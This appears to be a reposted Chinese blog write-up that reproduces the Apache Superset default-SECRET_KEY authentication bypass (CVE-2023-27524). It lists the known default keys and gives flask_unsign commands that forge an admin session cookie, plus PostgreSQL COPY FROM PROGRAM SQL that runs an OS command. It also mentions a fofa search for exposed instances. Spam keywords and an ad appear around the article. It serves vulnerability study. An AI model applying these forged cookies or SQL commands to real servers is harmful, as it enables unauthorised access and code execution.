国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache Superset 身份認(rèn)證繞過(guò)漏洞(CVE-2023-27524)

這篇具有很好參考價(jià)值的文章主要介紹了Apache Superset 身份認(rèn)證繞過(guò)漏洞(CVE-2023-27524)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

漏洞簡(jiǎn)介

Apache Superset是一個(gè)開(kāi)源的數(shù)據(jù)可視化和數(shù)據(jù)探測(cè)平臺(tái),它基于Python構(gòu)建,使用了一些類似于Django和Flask的Python web框架。提供了一個(gè)用戶友好的界面,可以輕松地創(chuàng)建和共享儀表板、查詢和可視化數(shù)據(jù),也可以集成到其他應(yīng)用程序中。由于用戶在默認(rèn)安裝過(guò)程中,未對(duì)SECRET_KEY的默認(rèn)值進(jìn)行更改,未經(jīng)身份驗(yàn)證的攻擊者通過(guò)偽造管理員身份進(jìn)行訪問(wèn)后臺(tái),并通過(guò)后臺(tái)原本數(shù)據(jù)庫(kù)執(zhí)行功能實(shí)現(xiàn)命令執(zhí)行操作。?

環(huán)境搭建

可以通過(guò) fofa 來(lái)搜索相關(guān)網(wǎng)站

"Apache Superset"

?

這里我們通過(guò) docker 來(lái)在本地搭建環(huán)境

?

git clone https://github.com/apache/superset.git
cd superset
git checkout 2.0.0
TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml pull
TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml up

官網(wǎng)提供的方法 并沒(méi)有搭建成功,還是直接在docker 倉(cāng)庫(kù)中查找

https://hub.docker.com/r/apache/superset/tags?page=1&ordering=last_updated&name=2.0.0

?

docker pull apache/superset:2.0.0
docker exec -it superset superset fab create-admin --username admin --firstname Superset  --lastname Admin --email admin@superset.com --password admin
docker exec -it superset superset db upgrade
docker exec -it superset superset load_examples
docker exec -it superset superset init

?漏洞復(fù)現(xiàn)

利用腳本檢測(cè)是否存在漏洞并生成相對(duì)應(yīng)的 cookie

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲取!】

?、?網(wǎng)安學(xué)習(xí)成長(zhǎng)路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
 ③ 100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫(kù)
?、?超1800頁(yè)CTF實(shí)戰(zhàn)技巧手冊(cè)
?、?最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測(cè)指南(安卓+IOS)

訪問(wèn)主頁(yè)抓取數(shù)據(jù)包

將生成的 session 替換原本的 session

?

成功登錄

接下來(lái)就是想辦法 getshell 網(wǎng)絡(luò)上的文章上是通過(guò)后臺(tái)數(shù)據(jù)庫(kù)執(zhí)行語(yǔ)句來(lái)獲取權(quán)限。

經(jīng)過(guò)復(fù)現(xiàn)分析,發(fā)現(xiàn)存在的問(wèn)題還比較多,首先是默認(rèn)情況下執(zhí)行語(yǔ)句僅僅支持 SELECT ,需要修改數(shù)據(jù)庫(kù)的權(quán)限允許其他的一些語(yǔ)句(but 一些版本上是沒(méi)有對(duì)數(shù)據(jù)庫(kù)的操作權(quán)限的),然后就是獲取的權(quán)限,本質(zhì)上也只是獲取了數(shù)據(jù)庫(kù)的執(zhí)行權(quán)限,數(shù)據(jù)庫(kù)有可能并不與 superset 在同一服務(wù)器上,再有就是需要數(shù)據(jù)庫(kù)本身也需要存在漏洞才可以,我這里選取了 (CVE-2019-9193)PostgreSQL 高權(quán)限命令執(zhí)行漏洞來(lái)復(fù)現(xiàn)漏洞。

?

?

?

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

?

漏洞分析

感覺(jué)這個(gè)漏洞有點(diǎn)像前段時(shí)間爆出來(lái)的 nacos 身份認(rèn)證繞過(guò)漏洞 存在默認(rèn)的密鑰

SECRET_KEYS = [
 ?  b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', ?# version < 1.4.1
 ?  b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', ? ? ? ? ?# version >= 1.4.1
 ?  b'thisISaSECRET_1234', ? ? ? ? ? ? ? ? ? ? ? ? ? ?# deployment template
 ?  b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', ? ? ? ? ?# documentation
 ?  b'TEST_NON_DEV_SECRET' ? ? ? ? ? ? ? ? ? ? ? ? ? ?# docker compose
]

Superset 是用 Python 編寫的,基于 Flask Web 框架?;?Flask 的應(yīng)用程序的常見(jiàn)做法是使用加密簽名的會(huì)話 cookie 進(jìn)行用戶狀態(tài)管理。當(dāng)用戶登錄時(shí),Web 應(yīng)用程序?qū)脩魳?biāo)識(shí)符的會(huì)話 cookie 發(fā)送回最終用戶的瀏覽器。Web 應(yīng)用程序使用 SECERT_KEY 對(duì) cookie 進(jìn)行簽名,該值應(yīng)該時(shí)隨機(jī)生成的,通常存儲(chǔ)在本地配置文件中,對(duì)于每個(gè) Web 請(qǐng)求,瀏覽器都會(huì)將已簽名的會(huì)話 cookie 發(fā)送回應(yīng)用程序,然后應(yīng)用程序驗(yàn)證 cookie 上的簽名以處理請(qǐng)求之前重新驗(yàn)證用戶。

整段描述下面我感覺(jué)跟 JWT 的相關(guān)驗(yàn)證方式差不太多,我們具體來(lái)操作看看。

首先就是請(qǐng)求的時(shí)候我們可以看到 cookie 值 可以解碼成功,通過(guò)爆破(當(dāng)然我們這里是已經(jīng)已知這個(gè) key 值),偽造生成用戶的 cookie,替換數(shù)據(jù)包中的cookie 值,就成功登錄成功,之后再次請(qǐng)求的時(shí)候,發(fā)現(xiàn)我們添加的字段已經(jīng)被保存在 session 值中

>>> from flask_unsign import session
>>> session.decode("eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiOGUzOTdiZTQ2ZjVlZjJiYTc1NjI4MWQxODE2NTAyMWEzMzcxYjI3OCIsImxvY2FsZSI6ImVuIn0.ZJAEeQ.wVfrGzupbWdw4R1OlzUwUqhGMMY")
{'_fresh': False, 'csrf_token': '8e397be46f5ef2ba756281d18165021a3371b278', 'locale': 'en'}
>>> session.sign({'_user_id': 1, 'user_id': 1},'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET')
'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZJAFNg.oWyP7v-1l0qOHFOMjSd-cFiVQLY'
>>> session.decode(".eJxFzEEOhCAQBMC_9JmDwMZBPkOUaaKRaALuabN_15sPqPohlca-Ipa5dhqkb2dLmyJag9xbSde580CEjoHiQlYOlt4VDVMe3CjTRxYv3i_qGEQsDOqZ58rHPNDgHf83roYh1w.ZJAFVw.IwmWyTU1bvoY2nhlFYdmwXNNtTM")
{'_fresh': False, '_user_id': 1, 'csrf_token': 'd68e728cde01e32fd89c0267947b3733bd2e8771', 'locale': 'en', 'user_id': 1}

?

漏洞修復(fù)

拒絕在非調(diào)試環(huán)境中使用默認(rèn)密碼啟動(dòng)

?

?

?更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-491938.html

到了這里,關(guān)于Apache Superset 身份認(rèn)證繞過(guò)漏洞(CVE-2023-27524)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA share身份認(rèn)證繞過(guò)漏洞

    【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA share身份認(rèn)證繞過(guò)漏洞

    通達(dá)OA(Office Anywhere網(wǎng)絡(luò)智能辦公系統(tǒng))是中國(guó)通達(dá)公司的一套協(xié)同辦公自動(dòng)化軟件。通達(dá)OA /share/handle.php存在一個(gè)認(rèn)證繞過(guò)漏洞,利用該漏洞可以實(shí)現(xiàn)任意用戶登錄。攻擊者可以通過(guò)構(gòu)造惡意攻擊代碼,成功登錄系統(tǒng)管理員賬戶,繼而在系統(tǒng)后臺(tái)上傳惡意文件控制網(wǎng)站服務(wù)器

    2024年02月19日
    瀏覽(70)
  • 【嚴(yán)重】Grafana Azure AD環(huán)境身份認(rèn)證繞過(guò)漏洞

    【嚴(yán)重】Grafana Azure AD環(huán)境身份認(rèn)證繞過(guò)漏洞

    ?Grafana 是一個(gè)跨平臺(tái)、開(kāi)源的數(shù)據(jù)可視化網(wǎng)絡(luò)應(yīng)用平臺(tái)。Azure AD 是由微軟提供的一種云身份驗(yàn)證和訪問(wèn)管理服務(wù)。 在 Azure AD 中,多個(gè)用戶可以擁有相同的電子郵件地址。攻擊者可以創(chuàng)建一個(gè)與目標(biāo) Grafana 賬戶相同的電子郵件地址的惡意帳戶,并且在 Azure AD 中配置支持多租戶

    2024年02月17日
    瀏覽(24)
  • 【備忘錄】修復(fù)docker環(huán)境下的nacos安全漏洞:身份認(rèn)證繞過(guò)漏洞

    【備忘錄】修復(fù)docker環(huán)境下的nacos安全漏洞:身份認(rèn)證繞過(guò)漏洞

    報(bào)告截取內(nèi)容如下 1.1 訪問(wèn)登錄口用戶名輸入nacos密碼輸入任意值,進(jìn)行抓包 1.2 偽造登錄憑證 添加有效登錄時(shí)間戳 登錄信息中 在payload中輸入nacos與時(shí)間戳 并添加入naco s默認(rèn)密鑰 SecretKey012345678901234567890123456789012345678901234567890123456789 同時(shí)選中base64加密 點(diǎn)擊生成 1.3 登錄包中新

    2024年02月01日
    瀏覽(20)
  • 【漏洞通告】 CVE-2022-40664 Apache Shiro 身份驗(yàn)證繞過(guò)漏洞

    目錄 0x01 聲明: 0x02 簡(jiǎn)介:?? 0x03 漏洞概述: 0x04 影響版本: 0x05 漏洞復(fù)現(xiàn):(暫未公開(kāi)利用方式) 0x06 臨時(shí)措施 0x07 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù)。 ????????Apache Shiro是一個(gè)強(qiáng)大且易用的Java安全框架,它具有身份驗(yàn)證、

    2024年02月13日
    瀏覽(61)
  • NACOS身份認(rèn)證繞過(guò)

    NACOS身份認(rèn)證繞過(guò)

    一、漏洞描述 Nacos是Alibaba的一個(gè)動(dòng)態(tài)服務(wù)發(fā)現(xiàn)、配置和服務(wù)管理平臺(tái)。攻擊者通過(guò)添加Nacos-Server的User-Agent頭部將可繞過(guò)(nacos.core.auth.enabled=true)鑒權(quán)認(rèn)證,從而進(jìn)行API操作。 二、漏洞利用 訪問(wèn) http://xxxxx/nacos/v1/auth/users?username=testpassword=test ,并使用burpsuite進(jìn)行抓包,將方法

    2024年02月16日
    瀏覽(27)
  • Nacos身份認(rèn)證漏洞

    Nacos身份認(rèn)證漏洞

    公司Nacos版本有用的2.0.1和2.0.3的都復(fù)現(xiàn)了身份認(rèn)證的漏洞,無(wú)需認(rèn)證身份就可以查看用戶列表以及注冊(cè)新用戶,并且注冊(cè)上來(lái)的新用戶可以查看所有public命名空間下的配置資源! 1、查看用戶列表 URL: http://ip:8848/nacos/v1/auth/users?pageNo=1pageSize=1 方法類型:GET 返回結(jié)果: 如圖示

    2023年04月10日
    瀏覽(25)
  • Apache Hudi DeltaStreamer 接入CDC數(shù)據(jù)時(shí)如何完成 Kafka 的身份認(rèn)證?

    題目有些拗口,簡(jiǎn)短截說(shuō),我們對(duì)于Apache Hudi DeltaStreamer在接入CDC數(shù)據(jù)時(shí),對(duì)于其如何通過(guò) Kafka 的身份認(rèn)證,做了一系列測(cè)試和研究,有如下明確結(jié)論: .?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?

    2024年02月16日
    瀏覽(25)
  • AppWeb 身份驗(yàn)證繞過(guò)漏洞 (CVE-2018-8715)

    AppWeb 身份驗(yàn)證繞過(guò)漏洞 (CVE-2018-8715)

    當(dāng)前漏洞環(huán)境部署在vulhub,當(dāng)前驗(yàn)證環(huán)境為vulhub靶場(chǎng)(所有實(shí)驗(yàn)均為虛擬環(huán)境) 實(shí)驗(yàn)環(huán)境:攻擊機(jī)----kali 靶機(jī):centos7 1、進(jìn)入靶場(chǎng),啟動(dòng)環(huán)境 2、訪問(wèn)AppWeb控制臺(tái):http://your-ip:8080 使用用戶名、密碼admin訪問(wèn) 訪問(wèn)失敗 3、抓包,使用用戶名、密碼admin 4、只保留用戶名參數(shù),發(fā)包

    2024年02月13日
    瀏覽(55)
  • 【burpsuite安全練兵場(chǎng)-服務(wù)端2】身份認(rèn)證漏洞-16個(gè)實(shí)驗(yàn)(全)

    【burpsuite安全練兵場(chǎng)-服務(wù)端2】身份認(rèn)證漏洞-16個(gè)實(shí)驗(yàn)(全)

    ?? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛(ài)好者(承諾在CSDN永久無(wú)償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。 擅長(zhǎng):

    2024年02月03日
    瀏覽(23)
  • Nacos認(rèn)證繞過(guò)漏洞(CVE-2021-29441)

    Nacos認(rèn)證繞過(guò)漏洞(CVE-2021-29441)

    指紋識(shí)別 漏洞范圍 nacos1.2.0版本-nacos1.4.0版本 漏洞復(fù)現(xiàn) 靶機(jī)ip:192.168.1.4 默認(rèn)的nacos登錄界面 利用如下請(qǐng)求包查看只有一個(gè)nacos用戶 用如下請(qǐng)求包添加用戶 再次查看我們的用戶增加了tpaer用戶 用新用戶登錄進(jìn)行驗(yàn)證,成功未授權(quán)訪問(wèn)繞過(guò)驗(yàn)證 漏洞原理 官方給出的文檔描述 開(kāi)

    2024年02月07日
    瀏覽(24)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包